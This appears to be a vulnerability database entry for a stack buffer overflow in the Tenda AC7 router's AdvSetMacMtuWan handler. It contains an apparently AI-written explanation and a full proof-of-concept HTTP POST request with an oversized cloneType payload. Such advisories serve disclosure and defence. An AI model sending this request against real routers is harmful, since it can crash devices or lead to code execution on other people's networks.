CVE-2026-51844
Description
Tenda AC7 v15.03.06.44 contains a stack buffer overflow vulnerability in the /goform/AdvSetMacMtuWan interface via the cloneType parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
1Patches
Vulnerability mechanics
Root cause
"The check_param_changed method uses strcpy to copy the user-controlled cloneType parameter into a fixed stack buffer without bounds checking, causing a stack buffer overflow."
Attack vector
An attacker on the same LAN as the Tenda AC7 router sends a crafted HTTP POST request to `/goform/AdvSetMacMtuWan` with an oversized `cloneType` parameter. The `check_param_changed` method copies this user-controlled input into a fixed stack buffer using `strcpy`, which performs no bounds checking. When the input exceeds the buffer capacity, a stack buffer overflow occurs [ref_id=1]. This can lead to denial of service or, with carefully crafted malicious data, remote arbitrary code execution [ref_id=1].
What the fix does
The advisory does not include a patch or vendor fix. The recommended remediation is to replace the unbounded `strcpy` call with a bounded copy function (e.g., `strncpy` or `snprintf`) that checks the destination buffer size, or to validate the length of the `cloneType` parameter before copying it onto the stack [ref_id=1]. Without such a change, the overflow remains exploitable.
Preconditions
- networkAttacker must be on the same LAN as the router (able to reach 192.168.0.1)
- authNo authentication bypass required; the PoC includes a valid cookie
- inputAttacker sends a POST request with an oversized cloneType parameter
Reproduction
POST /goform/AdvSetMacMtuWan HTTP/1.1 Host: 192.168.0.1 Content-Length: 715 X-Requested-With: XMLHttpRequest Accept-Language: zh-CN,zh;q=0.9 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Origin: http://192.168.0.1 Referer: http://192.168.0.1/mac_clone.html?random=0.6216016377171282& Accept-Encoding: gzip, deflate, br Cookie: password=yzu1qw Connection: keep-alive
wanMTU=1500&wanSpeed=0&cloneType=1AAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&mac=B4:0F:3B:2E:64:19
Generated on Jun 20, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1News mentions
0No linked articles in our index yet.